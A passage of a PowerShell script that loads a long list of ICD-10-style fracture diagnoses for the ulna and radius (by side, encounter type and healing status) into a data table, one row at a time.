$DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of right ulna","Nondisplaced fracture of coronoid process of right ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of right ulna","Nondisplaced fracture of coronoid process of right ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of right ulna","Nondisplaced fracture of coronoid process of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of right ulna","Nondisplaced fracture of coronoid process of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of left ulna","Nondisplaced fracture of coronoid process of left ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of left ulna","Nondisplaced fracture of coronoid process of left ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of left ulna","Nondisplaced fracture of coronoid process of left ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of left ulna","Nondisplaced fracture of coronoid process of left ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of left ulna","Nondisplaced fracture of coronoid process of left ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of left ulna","Nondisplaced fracture of coronoid process of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of left ulna","Nondisplaced fracture of coronoid process of left ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of left ulna","Nondisplaced fracture of coronoid process of left ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of left ulna","Nondisplaced fracture of coronoid process of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of left ulna","Nondisplaced fracture of coronoid process of left ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of left ulna","Nondisplaced fracture of coronoid process of left ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of left ulna","Nondisplaced fracture of coronoid process of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of left ulna","Nondisplaced fracture of coronoid process of left ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of left ulna","Nondisplaced fracture of coronoid process of left ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of left ulna","Nondisplaced fracture of coronoid process of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of left ulna","Nondisplaced fracture of coronoid process of left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of unspecified ulna","Nondisplaced fracture of coronoid process of unspecified ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of unspecified ulna","Nondisplaced fracture of coronoid process of unspecified ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of unspecified ulna","Nondisplaced fracture of coronoid process of unspecified ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of unspecified ulna","Nondisplaced fracture of coronoid process of unspecified ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of unspecified ulna","Nondisplaced fracture of coronoid process of unspecified ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of unspecified ulna","Nondisplaced fracture of coronoid process of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of unspecified ulna","Nondisplaced fracture of coronoid process of unspecified ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of unspecified ulna","Nondisplaced fracture of coronoid process of unspecified ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of unspecified ulna","Nondisplaced fracture of coronoid process of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of unspecified ulna","Nondisplaced fracture of coronoid process of unspecified ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of unspecified ulna","Nondisplaced fracture of coronoid process of unspecified ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of unspecified ulna","Nondisplaced fracture of coronoid process of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of unspecified ulna","Nondisplaced fracture of coronoid process of unspecified ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of unspecified ulna","Nondisplaced fracture of coronoid process of unspecified ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of unspecified ulna","Nondisplaced fracture of coronoid process of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coronoid process of unspecified ulna","Nondisplaced fracture of coronoid process of unspecified ulna, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right ulna","Other fracture of upper end of right ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right ulna","Other fracture of upper end of right ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right ulna","Other fracture of upper end of right ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right ulna","Other fracture of upper end of right ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right ulna","Other fracture of upper end of right ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right ulna","Other fracture of upper end of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right ulna","Other fracture of upper end of right ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right ulna","Other fracture of upper end of right ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right ulna","Other fracture of upper end of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right ulna","Other fracture of upper end of right ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right ulna","Other fracture of upper end of right ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right ulna","Other fracture of upper end of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right ulna","Other fracture of upper end of right ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right ulna","Other fracture of upper end of right ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right ulna","Other fracture of upper end of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right ulna","Other fracture of upper end of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left ulna","Other fracture of upper end of left ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left ulna","Other fracture of upper end of left ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left ulna","Other fracture of upper end of left ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left ulna","Other fracture of upper end of left ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left ulna","Other fracture of upper end of left ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left ulna","Other fracture of upper end of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left ulna","Other fracture of upper end of left ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left ulna","Other fracture of upper end of left ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left ulna","Other fracture of upper end of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left ulna","Other fracture of upper end of left ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left ulna","Other fracture of upper end of left ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left ulna","Other fracture of upper end of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left ulna","Other fracture of upper end of left ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left ulna","Other fracture of upper end of left ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left ulna","Other fracture of upper end of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left ulna","Other fracture of upper end of left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified ulna","Other fracture of upper end of unspecified ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified ulna","Other fracture of upper end of unspecified ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified ulna","Other fracture of upper end of unspecified ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified ulna","Other fracture of upper end of unspecified ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified ulna","Other fracture of upper end of unspecified ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified ulna","Other fracture of upper end of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified ulna","Other fracture of upper end of unspecified ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified ulna","Other fracture of upper end of unspecified ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified ulna","Other fracture of upper end of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified ulna","Other fracture of upper end of unspecified ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified ulna","Other fracture of upper end of unspecified ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified ulna","Other fracture of upper end of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified ulna","Other fracture of upper end of unspecified ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified ulna","Other fracture of upper end of unspecified ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified ulna","Other fracture of upper end of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified ulna","Other fracture of upper end of unspecified ulna, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right radius","Unspecified fracture of upper end of right radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right radius","Unspecified fracture of upper end of right radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right radius","Unspecified fracture of upper end of right radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right radius","Unspecified fracture of upper end of right radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right radius","Unspecified fracture of upper end of right radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right radius","Unspecified fracture of upper end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right radius","Unspecified fracture of upper end of right radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right radius","Unspecified fracture of upper end of right radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right radius","Unspecified fracture of upper end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right radius","Unspecified fracture of upper end of right radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right radius","Unspecified fracture of upper end of right radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right radius","Unspecified fracture of upper end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right radius","Unspecified fracture of upper end of right radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right radius","Unspecified fracture of upper end of right radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right radius","Unspecified fracture of upper end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of right radius","Unspecified fracture of upper end of right radius, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left radius","Unspecified fracture of upper end of left radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left radius","Unspecified fracture of upper end of left radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left radius","Unspecified fracture of upper end of left radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left radius","Unspecified fracture of upper end of left radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left radius","Unspecified fracture of upper end of left radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left radius","Unspecified fracture of upper end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left radius","Unspecified fracture of upper end of left radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left radius","Unspecified fracture of upper end of left radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left radius","Unspecified fracture of upper end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left radius","Unspecified fracture of upper end of left radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left radius","Unspecified fracture of upper end of left radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left radius","Unspecified fracture of upper end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left radius","Unspecified fracture of upper end of left radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left radius","Unspecified fracture of upper end of left radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left radius","Unspecified fracture of upper end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of left radius","Unspecified fracture of upper end of left radius, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified radius","Unspecified fracture of upper end of unspecified radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified radius","Unspecified fracture of upper end of unspecified radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified radius","Unspecified fracture of upper end of unspecified radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified radius","Unspecified fracture of upper end of unspecified radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified radius","Unspecified fracture of upper end of unspecified radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified radius","Unspecified fracture of upper end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified radius","Unspecified fracture of upper end of unspecified radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified radius","Unspecified fracture of upper end of unspecified radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified radius","Unspecified fracture of upper end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified radius","Unspecified fracture of upper end of unspecified radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified radius","Unspecified fracture of upper end of unspecified radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified radius","Unspecified fracture of upper end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified radius","Unspecified fracture of upper end of unspecified radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified radius","Unspecified fracture of upper end of unspecified radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified radius","Unspecified fracture of upper end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of upper end of unspecified radius","Unspecified fracture of upper end of unspecified radius, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right radius","Torus fracture of upper end of right radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right radius","Torus fracture of upper end of right radius, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right radius","Torus fracture of upper end of right radius, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right radius","Torus fracture of upper end of right radius, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right radius","Torus fracture of upper end of right radius, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right radius","Torus fracture of upper end of right radius, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left radius","Torus fracture of upper end of left radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left radius","Torus fracture of upper end of left radius, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left radius","Torus fracture of upper end of left radius, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left radius","Torus fracture of upper end of left radius, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left radius","Torus fracture of upper end of left radius, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left radius","Torus fracture of upper end of left radius, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified radius","Torus fracture of upper end of unspecified radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified radius","Torus fracture of upper end of unspecified radius, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified radius","Torus fracture of upper end of unspecified radius, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified radius","Torus fracture of upper end of unspecified radius, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified radius","Torus fracture of upper end of unspecified radius, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified radius","Torus fracture of upper end of unspecified radius, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of right radius","Displaced fracture of head of right radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of right radius","Displaced fracture of head of right radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of right radius","Displaced fracture of head of right radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of right radius","Displaced fracture of head of right radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of right radius","Displaced fracture of head of right radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of right radius","Displaced fracture of head of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of right radius","Displaced fracture of head of right radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of right radius","Displaced fracture of head of right radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of right radius","Displaced fracture of head of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of right radius","Displaced fracture of head of right radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of right radius","Displaced fracture of head of right radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of right radius","Displaced fracture of head of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of right radius","Displaced fracture of head of right radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of right radius","Displaced fracture of head of right radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of right radius","Displaced fracture of head of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of right radius","Displaced fracture of head of right radius, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of left radius","Displaced fracture of head of left radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of left radius","Displaced fracture of head of left radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of left radius","Displaced fracture of head of left radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of left radius","Displaced fracture of head of left radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of left radius","Displaced fracture of head of left radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of left radius","Displaced fracture of head of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of left radius","Displaced fracture of head of left radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of left radius","Displaced fracture of head of left radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of left radius","Displaced fracture of head of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of left radius","Displaced fracture of head of left radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of left radius","Displaced fracture of head of left radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of left radius","Displaced fracture of head of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of left radius","Displaced fracture of head of left radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of left radius","Displaced fracture of head of left radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of left radius","Displaced fracture of head of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of left radius","Displaced fracture of head of left radius, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of unspecified radius","Displaced fracture of head of unspecified radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of unspecified radius","Displaced fracture of head of unspecified radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of unspecified radius","Displaced fracture of head of unspecified radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of unspecified radius","Displaced fracture of head of unspecified radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of unspecified radius","Displaced fracture of head of unspecified radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of unspecified radius","Displaced fracture of head of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of unspecified radius","Displaced fracture of head of unspecified radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of unspecified radius","Displaced fracture of head of unspecified radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of unspecified radius","Displaced fracture of head of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of unspecified radius","Displaced fracture of head of unspecified radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of unspecified radius","Displaced fracture of head of unspecified radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of unspecified radius","Displaced fracture of head of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of unspecified radius","Displaced fracture of head of unspecified radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of unspecified 